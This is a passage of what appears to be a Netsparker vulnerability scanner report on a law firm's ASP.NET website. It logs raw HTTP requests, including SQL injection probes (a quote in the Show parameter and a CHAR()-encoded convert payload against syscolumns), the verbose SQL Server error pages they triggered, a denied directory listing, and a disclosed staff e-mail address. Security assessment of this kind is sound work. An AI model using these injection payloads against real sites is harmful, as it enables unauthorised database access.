DQpcPHAgYWxpZ249bGVmdFw XDwvcFw DQpcPHAgYWxpZ249bGVmdFw TUJUQSAoU3Vid2F5KSBEaXJlY3Rpb25zIFw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlJlZCBMaW5lXDwvYlw OiBGcm9tIFNvdXRoIFN0YXRpb24gKGV4aXQgdmlhIHRoZSBtYWluIGVudHJhbmNlIGFuZCBjcm9zcyBBdGxhbnRpYyBBdmVudWUgdG8gRmVkZXJhbCBTdHJlZXQpIHByb2NlZWQgdHdvIGJsb2NrcyBhbmQgdGFrZSBhIHJpZ2h0IG9udG8gRnJhbmtsaW4gU3RyZWV0LiBDb250aW51ZSBvbiBGcmFua2xpbiBTdHJlZXQgZm9yIDMgYmxvY2tzLiAyNjUgRnJhbmtsaW4gaXMgb24gdGhlIGNvcm5lciBvZiBGcmFua2xpbiBhbmQgT2xpdmVyLiBcPC9wXD5cPGJcPg0KXDxwIGFsaWduPWxlZnRcPkdyZWVuIExpbmVcPC9iXD46IEZyb20gR292ZXJubWVudCBDZW50ZXIgU3RhdGlvbiwgZ28gbGVmdCBvbnRvIENvdXJ0IFN0cmVldCB3aGljaCB0dXJucyBpbnRvIFN0YXRlIFN0cmVldCBhdCB0aGUgQ29uZ3Jlc3MgU3RyZWV0IGludGVyc2VjdGlvbi4gTWFrZSBhIHJpZ2h0IGF0IENvbmdyZXNzIFN0cmVldCBhbmQgcHJvY2VlZCAzLTQgYmxvY2tzIHRvIEZyYW5rbGluIFN0cmVldC4gVHVybiBsZWZ0IGF0IEZyYW5rbGluIFN0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8Ylw DQpcPHBcPk9yYW5nZS9CbHVlIExpbmVcPC9iXD46IEZyb20gU3RhdGUgU3RyZWV0IFN0YXRpb24sIHRha2UgYSByaWdodCBvbiBDb25ncmVzcyBTdHJlZXQgYW5kIHByb2NlZWQgdGhyZWUgdG8gZm91ciBibG9ja3MgdG8gRnJhbmtsaW4gU3RyZWV0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8L2Zvb1w DQpcPGRpdlw DQpcPGRpdlw DQpcPHBcPk1jQ2FydGVyICZhbXBcOyBFbmdsaXNoIGlzIGxvY2F0ZWQgYXQgMjY1IEZyYW5rbGluIFN0cmVldC4mbmJzcFw7IE91ciBvZmZpY2VzIGFyZSBvbiB0aGUgMTR0aCBmbG9vci4mbmJzcFw7IFBsZWFzZSBjYWxsIHVzIGF0IDYxNy00NDktNjUwMC4gXDwvcFw DQpcPHBcPlNtYXJUcmF2ZWxlciBcPGJyXD5Gb3IgcmVhbC10aW1lLCByb3V0ZS1zcGVjaWZpYyB0cmFmZmljIHJlcG9ydHMsIFNtYXJUcmF2ZWxlciBjYW4gYWxzbyBiZSByZWFjaGVkIGF0IDYxNy0zNzQtMTIzNC5cPGJyXD5cPC9wXD5cPC9kaXZcPlw8L2Rpdlw Oz4 Oz47Oz47Pj47dDw7bDxpPDE Oz47bDx0PHA8cDxsPFRleHQ7PjtsPEJvc3RvbiBNYWluOz4 Oz47Oz47Pj47Pj47Pj47PhAty6L 8bEAq44RzBhw7T/ELP 0

Request

POST /new/showlocationnew.aspx?PrintPage=True&Show=%2527&sortby=3&by=3&title=3&related=3 HTTP/1.1
Referer: http://www.mccarter.com/new/showlocationnew.aspx?PrintPage=True&Show=1433&sortby=&by=&title=&related=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Content-Length: 6698
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM%2bOz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA%2bO2k8MT47PjtsPHQ8O2w8aTwzPjs%2bO2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciZuYnNwXDtcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQzMyIgaHR0cDogd3d3Lm1jY2FydGVyLmNvbSB3d3cyIGJpb3NuZXcuYXNweD9TZWFyY2g9J1RydWUmYW1wXDtMb2NhdGlvbj04IidcPiZuYnNwXDtCT1NUT04gT2ZmaWNlIExhd3llcnNcPC9hXD5cPGEgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQiXD5cPC9hXD5cPC9zdHJvbmdcPlw8L3BcPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9wXD5cPGZvbyBmYWNlPUFyaWFsIHNpemU9Mlw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gQm9zdG9uIE9mZmljZSBHYXJhZ2U6XDwvc3Ryb25nXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPHN0cm9uZ1w%2bRnJvbSBwb2ludHMgTm9ydGg6IFw8L3N0cm9uZ1w%2bVGFrZSBSb3V0ZSA5MyBTb3V0aCB0byBleGl0IDI0QS4gRXhpdCAyNEEgaXMgb24gdGhlIHJpZ2h0LCBhYm91dCAmIzE4OFw7IG1pbGUgYWZ0ZXIgeW91IGVudGVyIHRoZSB0dW5uZWwuIFN0YXkgdG8gdGhlIHJpZ2h0IHNpZGUgb2YgdGhlIGV4aXQgcmFtcCB1bnRpbCBleGl0IDI0QSBqb2lucyB0aGUgSkZLIFN1cmZhY2UgUm9hZCBhdCB0aGUgdHJhZmZpYyBsaWdodHMuIFRha2UgYSBsZWZ0IGF0IHRoZSBlbmQgb2YgdGhlIG9mZiByYW1wIChhdCBsaWdodHMpLiBGb2xsb3cgdGhlIFN1cmZhY2UgUm9hZCwga2VlcGluZyBCb3N0b24gSGFyYm9yIGFuZCB0aGUgTWFycmlvdHQtTG9uZyBXaGFyZiBIb3RlbCB0byB5b3VyIGxlZnQuIFRha2UgYSByaWdodCB0dXJuIG9udG8gQnJvYWQgU3RyZWV0LCBqdXN0IGFmdGVyIHBhc3NpbmcgdGhlIEhhcmJvciBQYXJraW5nIEdhcmFnZSBvbiB5b3VyIGxlZnQuIFRha2UgdGhlIDFzdCBsZWZ0LCB3aGljaCBpcyBGcmFua2xpbiBTdHJlZXQuIFByb2NlZWQgc3RyYWlnaHQgZm9yIDMgYmxvY2tzIGFuZCB0YWtlIGEgcmlnaHQgb250byBQZWFybCBTdHJlZXQsIGFuZCBhbiBpbW1lZGlhdGUgbGVmdCBpbnRvIHRoZSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIHBhcmsuIFw8aVw%2bRm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9pXD5cPHN0cm9uZ1w%2bRnJvbSBwb2ludHMgU291dGg6Jm5ic3BcO1w8L3N0cm9uZ1w%2bVGFrZSBSb3V0ZSA5MyBOb3J0aCB0byB0YWtlIGV4aXQgMjMuIFRha2UgYW4gaW1tZWRpYXRlIGxlZnQgb2ZmIHRoZSBleGl0IG9udG8gSm9obiBGLiBGaXR6Z2VyYWxkIFN1cmZhY2UgUmQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMsIGF0IHRoZSBGcmFua2xpbiBTdHJlZXQgaW50ZXJzZWN0aW9uLCB0aGUgZW50cmFuY2UgdG8gdGhlIGdhcmFnZSB3aWxsIGJlIGltbWVkaWF0ZWx5IG9uIHRoZSBsZWZ0LiBcPGVtXD5Gb3Igd2Fsa2luZyBkaXJlY3Rpb25zIGZyb20gdGhlIGdhcmFnZSB0byBvdXIgYnVpbGRpbmcsIHBsZWFzZSBzZWUgYmVsb3cuIFw8L2VtXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9mb29cPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD5cPHN0cm9uZ1w%2bRnJvbSBMb2dhbiBBaXJwb3J0OiBcPC9zdHJvbmdcPkZvbGxvdyB0aGUgQWlycG9ydCBleGl0IHNpZ25zIHRvIEktOTAgV2VzdC9UaGUgVGVkIFdpbGxpYW1zIFR1bm5lbC4gVGFrZSBleGl0IDI1IC0gU291dGggQm9zdG9uLiBUdXJuIGxlZnQgb250byBOb3J0aGVybiBBdmVudWUvU2VhcG9ydCBCb3VsZXZhcmQuIFlvdSB3aWxsIGdvIG92ZXIgdGhlIE1vYWtsZXkgQnJpZGdlLCBhbmQgY29udGludWUgdG8gZm9sbG93IFNlYXBvcnQgQm91bGV2YXJkLiBUdXJuIGxlZnQgb250byBQdXJjaGFzZSBTdHJlZXQuIFR1cm4gcmlnaHQgb250byBQZWFybCBTdHJlZXQuIEFmdGVyIHRoZSBzZWNvbmQgc2V0IG9mIGxpZ2h0cywgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgb24gdGhlIGxlZnQgaGFuZCBzaWRlLiBcPGlcPkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSB0aGUgZ2FyYWdlIHRvIG91ciBidWlsZGluZywgcGxlYXNlIHNlZSBiZWxvdy4gXDwvcFw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDwvaVw%2bXDxzdHJvbmdcPkZyb20gdGhlIE1hc3MgUGlrZTombmJzcFw7XDwvc3Ryb25nXD5Gb2xsb3cgdGhlIE1hc3NhY2h1c2V0dHMgVHVybnBpa2UgKDkwIEVhc3QpIGludG8gQm9zdG9uLiBUYWtlIGV4aXQgMjRCIHRvIEktOTMgTm9ydGggdG8gZXhpdCAyMy4gVGFrZSBhbiBpbW1lZGlhdGUgbGVmdCBvZmYgdGhlIGV4aXQgb250byBKb2huIEYuIEZpdHpnZXJhbGQgU3VyZmFjZSBSZC9TdXJmYWNlIFJvYWQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgaW1tZWRpYXRlbHkgb24gdGhlIGxlZnQuIFw8aVw%2bRm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD5cPC9pXD5cPC9mb29cPg0KXDxwIGFsaWduPWxlZnRcPlw8c3Ryb25nXD4qKkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIDI2NSBGcmFua2xpbiBTdHJlZXQqKlw8L3N0cm9uZ1w%2bXDxpXD5cPGJyXD5cPC9pXD5XaGVuIHlvdSBjb21lIG91dCBvZiB0aGUgR2FyYWdlLCB0dXJuIGxlZnQoc3RheWluZyBvbiBGcmFua2xpbiBTdHJlZXQpYW5kIHByb2NlZWQgdG93YXJkcyB0aGUgTGFuZ2hhbSBIb3RlbC4gV2FsayBzdHJhaWdodCBkb3duIEZyYW5rbGluIFN0cmVldCB0d28gYmxvY2tzIHRvIG91ciBidWlsZGluZyBhdCAyNjUgRnJhbmtsaW4gU3RyZWV0LiBQbGVhc2UgY2hlY2sgaW4gYXQgdGhlIFNlY3VyaXR5IERlc2sgYW5kIHByb2NlZWQgdG8gdGhlIDE0XDxzdXBcPnRoXDwvc3VwXD4gRmxvb3IuIFw8L3BcPlw8Ylw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDwvcFw%2bDQpcPHAgYWxpZ249bGVmdFw%2bTUJUQSAoU3Vid2F5KSBEaXJlY3Rpb25zIFw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlJlZCBMaW5lXDwvYlw%2bOiBGcm9tIFNvdXRoIFN0YXRpb24gKGV4aXQgdmlhIHRoZSBtYWluIGVudHJhbmNlIGFuZCBjcm9zcyBBdGxhbnRpYyBBdmVudWUgdG8gRmVkZXJhbCBTdHJlZXQpIHByb2NlZWQgdHdvIGJsb2NrcyBhbmQgdGFrZSBhIHJpZ2h0IG9udG8gRnJhbmtsaW4gU3RyZWV0LiBDb250aW51ZSBvbiBGcmFua2xpbiBTdHJlZXQgZm9yIDMgYmxvY2tzLiAyNjUgRnJhbmtsaW4gaXMgb24gdGhlIGNvcm5lciBvZiBGcmFua2xpbiBhbmQgT2xpdmVyLiBcPC9wXD5cPGJcPg0KXDxwIGFsaWduPWxlZnRcPkdyZWVuIExpbmVcPC9iXD46IEZyb20gR292ZXJubWVudCBDZW50ZXIgU3RhdGlvbiwgZ28gbGVmdCBvbnRvIENvdXJ0IFN0cmVldCB3aGljaCB0dXJucyBpbnRvIFN0YXRlIFN0cmVldCBhdCB0aGUgQ29uZ3Jlc3MgU3RyZWV0IGludGVyc2VjdGlvbi4gTWFrZSBhIHJpZ2h0IGF0IENvbmdyZXNzIFN0cmVldCBhbmQgcHJvY2VlZCAzLTQgYmxvY2tzIHRvIEZyYW5rbGluIFN0cmVldC4gVHVybiBsZWZ0IGF0IEZyYW5rbGluIFN0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8Ylw%2bDQpcPHBcPk9yYW5nZS9CbHVlIExpbmVcPC9iXD46IEZyb20gU3RhdGUgU3RyZWV0IFN0YXRpb24sIHRha2UgYSByaWdodCBvbiBDb25ncmVzcyBTdHJlZXQgYW5kIHByb2NlZWQgdGhyZWUgdG8gZm91ciBibG9ja3MgdG8gRnJhbmtsaW4gU3RyZWV0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8L2Zvb1w%2bDQpcPGRpdlw%2bDQpcPGRpdlw%2bDQpcPHBcPk1jQ2FydGVyICZhbXBcOyBFbmdsaXNoIGlzIGxvY2F0ZWQgYXQgMjY1IEZyYW5rbGluIFN0cmVldC4mbmJzcFw7IE91ciBvZmZpY2VzIGFyZSBvbiB0aGUgMTR0aCBmbG9vci4mbmJzcFw7IFBsZWFzZSBjYWxsIHVzIGF0IDYxNy00NDktNjUwMC4gXDwvcFw%2bDQpcPHBcPlNtYXJUcmF2ZWxlciBcPGJyXD5Gb3IgcmVhbC10aW1lLCByb3V0ZS1zcGVjaWZpYyB0cmFmZmljIHJlcG9ydHMsIFNtYXJUcmF2ZWxlciBjYW4gYWxzbyBiZSByZWFjaGVkIGF0IDYxNy0zNzQtMTIzNC5cPGJyXD5cPC9wXD5cPC9kaXZcPlw8L2Rpdlw%2bOz4%2bOz47Oz47Pj47dDw7bDxpPDE%2bOz47bDx0PHA8cDxsPFRleHQ7PjtsPEJvc3RvbiBNYWluOz4%2bOz47Oz47Pj47Pj47Pj47PhAty6L%2b8bEAq44RzBhw7T%2fELP%2b0

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 17:47:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4343


<html>
<head>
<title>Incorrect syntax near '27'.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Incorrect syntax near '27'.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Incorrect syntax near '27'.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Incorrect syntax near '27'.]
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream) +742
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior) +45
_SaturnoTools.Library.libData.GetReader(String strSQL) +143
Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Incorrect syntax near '27'.
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream)
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior)
at _SaturnoTools.Library.libData.GetReader(String strSQL)
at Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /new/css/

/new/css/ CONFIRMED

http://www.mccarter.com/new/css/

Request

GET /new/css/ HTTP/1.1
Referer: http://www.mccarter.com/new/css/me_allnew.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:19:11 GMT


<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html>
Microsoft SQL Server Identified

Microsoft SQL Server Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using Microsoft SQL Server as backend database. This issue is reported for information purposes only.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.
- /new/showlocationnew.aspx

/new/showlocationnew.aspx CONFIRMED

http://www.mccarter.com/new/showlocationnew.aspx?show=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR..

Request

GET /new/showlocationnew.aspx?show=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:19:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4176


<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.]
System.Data.SqlClient.SqlDataReader.Read() +176
Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.
at System.Data.SqlClient.SqlDataReader.Read()
at Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /new/homenew.aspx

/new/homenew.aspx

http://www.mccarter.com/new/homenew.aspx?searchlink=showbionew&Show=1121

Found E-mails

bwinnick@mccarter.com

Request

GET /new/homenew.aspx?searchlink=showbionew&Show=1121 HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache,no-cache,no-cache,no-cache,no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 44685



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
<HEAD>
<title>Welcome to McCarter</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOODP">
<META NAME="KEYWORDS" CONTENT="McCarter,McCarter & English,McCarter and English,McCarter English">
<META NAME="DESCRIPTION" CONTENT="McCarter & English, LLP is a firm of over 400 lawyers with offices in Boston, Hartford, Stamford, New York City, Newark, Philadelphia and Wilmington.">
<script language="JavaScript" type="text/JavaScript">
<!--
function OpenWindow(url, name,features )
{
window.open(url, name,features)
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<script>
function MM_jumpMenu(targ,selObj,restore){ //v3.0
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
</script>
<script>
function emailWarning(){
